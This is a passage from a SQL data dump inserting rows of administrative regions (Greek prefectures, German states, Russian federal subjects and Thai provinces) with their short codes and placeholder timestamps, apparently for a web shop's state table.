00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(541,1,84,0,'ΠΡΕΒΕΖΑΣ','ΠΡΕ','ΠΡ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(542,1,84,0,'ΡΕΘΥΜΝΗΣ','ΡΕΘ','ΡΕ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(543,1,84,0,'ΡΟΔΟΠΗΣ','ΡΟΔ','ΡΟ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(544,1,84,0,'ΣΑΜΟΥ','ΣΑΜ','ΣΑ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(545,1,84,0,'ΣΕΡΡΩΝ','ΣΕΡ','ΣΕ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(546,1,84,0,'ΤΡΙΚΑΛΩΝ','ΤΡΙ','ΤΡ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(547,1,84,0,'ΦΘΙΩΤΙΔΑΣ','ΦΘΙ','ΦΘ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(548,1,84,0,'ΦΛΩΡΙΝΑΣ','ΦΛΩ','ΦΛ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(549,1,84,0,'ΦΩΚΙΔΑΣ','ΦΩΚ','ΦΩ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(550,1,84,0,'ΧΑΛΚΙΔΙΚΗΣ','ΧΑΛ','ΧΑ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(551,1,84,0,'ΧΑΝΙΩΝ','ΧΑΝ','ΧΝ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(552,1,84,0,'ΧΙΟΥ','ΧΙΟ','ΧΙ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(569,1,81,0,'Schleswig-Holstein','SHO','SH',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(554,1,81,0,'Freie und Hansestadt Hamburg','HAM','HH',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(555,1,81,0,'Niedersachsen','NIS','NI',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(556,1,81,0,'Freie Hansestadt Bremen','HBR','HB',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(557,1,81,0,'Nordrhein-Westfalen','NRW','NW',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(558,1,81,0,'Hessen','HES','HE',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(559,1,81,0,'Rheinland-Pfalz','RLP','RP',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(560,1,81,0,'Baden-Württemberg','BWÜ','BW',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(561,1,81,0,'Freistaat Bayern','BAV','BY',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(562,1,81,0,'Saarland','SLA','SL',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(563,1,81,0,'Berlin','BER','BE',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(564,1,81,0,'Brandenburg','BRB','BB',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(565,1,81,0,'Mecklenburg-Vorpommern','MVO','MV',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(566,1,81,0,'Freistaat Sachsen','SAC','SN',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(567,1,81,0,'Sachsen-Anhalt','SAA','ST',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(568,1,81,0,'Freistaat Thüringen','THÜ','TH',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(570,1,176,0,'Адыгея Республика','AD','01',1,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(571,1,176,0,'Алтай Республика','AL','04',2,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(572,1,176,0,'Алтайский край','ALT','22',3,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(573,1,176,0,'Амурская область','AMU','28',4,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(574,1,176,0,'Архангельская область','ARK','29',5,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(575,1,176,0,'Астраханская область','AST','30',6,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(576,1,176,0,'Башкортостан Республика','BA','02',7,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(577,1,176,0,'Белгородская область','BEL','31',8,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(578,1,176,0,'Брянская область','BRY','32',9,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(579,1,176,0,'Бурятия Республика','BU','03',10,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(580,1,176,0,'Владимирская область','VLA','33',11,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(581,1,176,0,'Волгоградская область','VGG','34',12,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(582,1,176,0,'Вологодская область','VLG','35',13,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(583,1,176,0,'Воронежская область','VOR','36',14,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(584,1,176,0,'Дагестан Республика','DA','05',15,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(585,1,176,0,'Еврейская автономная область','YEV','79',16,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(586,1,176,0,'Забайкальский край','ZAB','75',17,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(587,1,176,0,'Ивановская область','IVA','37',18,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(588,1,176,0,'Ингушетия Республика','IN','06',19,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(589,1,176,0,'Иркутская область','IRK','38',20,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(590,1,176,0,'Кабардино-Балкарская Республика','KB','07',21,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(591,1,176,0,'Калининградская область','KGD','39',22,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(592,1,176,0,'Калмыкия Республика','KL','08',23,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(593,1,176,0,'Калужская область','KLU','40',24,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(594,1,176,0,'Камчатский край','KAM','41',25,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(595,1,176,0,'Карачаево-Черкесская Республика','KC','09',26,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(596,1,176,0,'Карелия Республика','KR','10',27,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(597,1,176,0,'Кемеровская область','KEM','42',28,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(598,1,176,0,'Кировская область','KIR','43',29,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(599,1,176,0,'Коми Республика','KO','11',30,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(600,1,176,0,'Костромская область','KOS','44',31,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(601,1,176,0,'Краснодарский край','KDA','23',32,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(602,1,176,0,'Красноярский край','KIA','24',33,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(603,1,176,0,'Курганская область','KGN','45',34,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(604,1,176,0,'Курская область','KRS','46',35,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(605,1,176,0,'Ленинградская область','LEN','47',36,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(606,1,176,0,'Липецкая область','LIP','48',37,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(607,1,176,0,'Магаданская область','MAG','49',38,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(608,1,176,0,'Марий Эл Республика','ME','12',39,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(609,1,176,0,'Мордовия Республика','MO','13',40,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(610,1,176,0,'Москва','MOW','77',41,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(611,1,176,0,'Московская область','MOS','50',42,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(612,1,176,0,'Мурманская область','MUR','51',43,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(613,1,176,0,'Ненецкий автономный округ','NEN','83',44,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(614,1,176,0,'Нижегородская область','NIZ','52',45,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(615,1,176,0,'Новгородская область','NGR','53',46,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(616,1,176,0,'Новосибирская область','NVS','54',47,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(617,1,176,0,'Омская область','OMS','55',48,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(618,1,176,0,'Оренбургская область','ORE','56',49,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(619,1,176,0,'Орловская область','ORL','57',50,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(620,1,176,0,'Пензенская область','PNZ','58',51,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(621,1,176,0,'Пермский край','PER','59',52,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(622,1,176,0,'Приморский край','PRI','25',53,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(623,1,176,0,'Псковская область','PSK','60',54,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(624,1,176,0,'Ростовская область','ROS','61',55,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(625,1,176,0,'Рязанская область','RYA','62',56,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(626,1,176,0,'Самарская область','SAM','63',57,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(627,1,176,0,'Санкт-Петербург','SPE','78',58,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(628,1,176,0,'Саратовская область','SAR','64',59,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(629,1,176,0,'Саха (Якутия) Республика','SA','14',60,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(630,1,176,0,'Сахалинская область','SAK','65',61,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(631,1,176,0,'Свердловская область','SVE','66',62,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(632,1,176,0,'Северная Осетия-Алания Республика','SE','15',63,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(633,1,176,0,'Смоленская область','SMO','67',64,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(634,1,176,0,'Ставропольский край','STA','26',65,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(635,1,176,0,'Тамбовская область','TAM','68',66,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(636,1,176,0,'Татарстан Республика','TA','16',67,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(637,1,176,0,'Тверская область','TVE','69',68,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(638,1,176,0,'Томская область','TOM','70',69,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(639,1,176,0,'Тульская область','TUL','71',70,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(640,1,176,0,'Тыва Республика','TY','17',71,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(641,1,176,0,'Тюменская область','TYU','72',72,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(642,1,176,0,'Удмуртская Республика','UD','18',73,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(643,1,176,0,'Ульяновская область','ULY','73',74,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(644,1,176,0,'Хакасия Республика','KK','19',75,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(645,1,176,0,'Челябинская область','CHE','74',76,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(646,1,176,0,'Чеченская Республика','CE','20',77,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(647,1,176,0,'Чувашская Республика','CU','21',78,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(648,1,176,0,'Чукотский автономный округ','CHU','87',79,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(649,1,176,0,'Хабаровский край','KHA','27',80,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(650,1,176,0,'Ханты-Мансийский автономный округ','KHM','86',81,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(651,1,176,0,'Ямало-Ненецкий автономный округ','YAN','89',82,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(652,1,176,0,'Ярославская область','YAR','76',83,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(653,1,209,0,'กระบี่','กบ','กบ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(654,1,209,0,'กรุงเทพมหานคร','กทม','กท',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(655,1,209,0,'กาญจนบุรี','กจ','กจ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(656,1,209,0,'กาฬสินธุ์','กส','กส',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(657,1,209,0,'กำแพงเพชร','กพ','กพ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(658,1,209,0,'ขอนแก่น','ขก','ขก',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(659,1,209,0,'จันทบุรี','จบ','จบ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(660,1,209,0,'ฉะเชิงเทรา','ฉช','ฉช',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(661,1,209,0,'ชลบุรี','ชบ','ชบ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(662,1,209,0,'ชัยนาท','ชน','ชน',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(663,1,209,0,'ชัยภูมิ','ชย','ชย',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(664,1,209,0,'ชุมพร','ชพ','ชพ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(665,1,209,0,'เชียงราย','ชร','ชร',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(666,1,209,0,'เชียงใหม่','ชม','ชม',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(667,1,209,0,'ตรัง','ตง','ตง',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(668,1,209,0,'ตราด','ตร','ตร',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(669,1,209,0,'ตาก','ตก','ตก',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(670,1,209,0,'นครนายก','นย','นย',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(671,1,209,0,'นครปฐม','นฐ','นฐ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(672,1,209,0,'นครพนม','นพ','นพ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(673,1,209,0,'นครราชสีมา','นม','นม',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(674,1,209,0,'นครศรีธรรมราช','นศ','นศ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(675,1,209,0,'นครสวรรค์','นว','นว',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(676,1,209,0,'นนทบุรี','นบ','นบ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(677,1,209,0,'นราธิวาส','นธ','นธ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(678,1,209,0,'น่าน','นน','นน',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(679,1,209,0,'บุรีรัมย์','บร','บร',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(680,1,209,0,'บึงกาฬ','บก','บก',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(681,1,209,0,'ปทุมธานี','ปท','ปท',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(682,1,209,0,'ประจวบคีรีขันธ์','ปข','ปข',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(683,1,209,0,'ปราจีนบุรี','ปจ','ปจ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(684,1,209,0,'ปัตตานี','ปน','ปน',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(685,1,209,0,'พระนครศรีอยุธยา','อย','อย',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(686,1,209,0,'พังงา','พง','พง',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(687,1,209,0,'พัทลุง','พท','พท',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(688,1,209,0,'พิจิตร','พจ','พจ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(689,1,209,0,'พิษณุโลก','พล','พล',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(690,1,209,0,'เพชรบุรี','พบ','พบ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(691,1,209,0,'เพชรบูรณ์','พช','พช',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(692,1,209,0,'แพร่','พร','พร',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(693,1,209,0,'พะเยา','พย','พย',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(694,1,209,0,'ภูเก็ต','ภก','ภก',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(695,1,209,0,'มหาสารคาม','มค','มค',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(696,1,209,0,'แม่ฮ่องสอน','มส','มส',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(697,1,209,0,'มุกดาหาร','มห','มห',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(698,1,209,0,'ยะลา','ยล','ยล',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(699,1,209,0,'ยโสธร','ยส','ยส',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(700,1,209,0,'ร้อยเอ็ด','รอ','รอ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(701,1,209,0,'ระนอง','รน','รน',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(702,1,209,0,'ระยอง','รย','รย',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(703,1,209,0,'ราชบุรี','รบ','รบ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(704,1,209,0,'ลพบุรี','ลบ','ลบ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(705,1,209,0,'ลำปาง','ลป','ลป',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(706,1,209,0,'ลำพูน','ลพ','ลพ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(707,1,209,0,'เลย','ลย','ลย',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(708,1,209,0,'ศรีสะเกษ','ศก','ศก',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(709,1,209,0,'สกลนคร','สน','สน',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(710,1,209,0,'สงขลา','สข','สข',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(711,1,209,0,'สตูล','สต','สต',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(712,1,209,0,'สมุทรปราการ','สป','สป',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(713,1,209,0,'สมุทรสงคราม','สส','สส',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(714,1,209,0,'สมุทรสาคร','สค','สค',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(715,1,209,0,'สระบุรี','สบ','สบ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(716,1,209,0,'สระแก้ว','สก','สก',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(717,1,209,0,'สิงห์บุรี','สห','สห',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(718,1,209,0,'สุโขทัย','สท','สท',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(719,1,209,0,'สุพรรณบุรี','สพ','สพ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(720,1,209,0,'สุราษฎร์ธานี','สฎ','สฎ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(721,1,209,0,'สุรินทร์','สร','สร',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(722,1,209,0,'หนองคาย','นค','นค',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(723,1,209,0,'หนองบัวลำภู','นภ','นภ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(724,1,209,0,'อ่างทอง','อท','อท',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(725,1,209,0,'อุดรธานี','อด','อด',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(726,1,209,0,'อุตรดิตถ์','อต','อต',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(727,1,209,0,'อุทัยธานี','อน','อน',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(728,1,209,0,'อุบลราชธานี','อบ','อบ',0,0,1,'0000-00-00 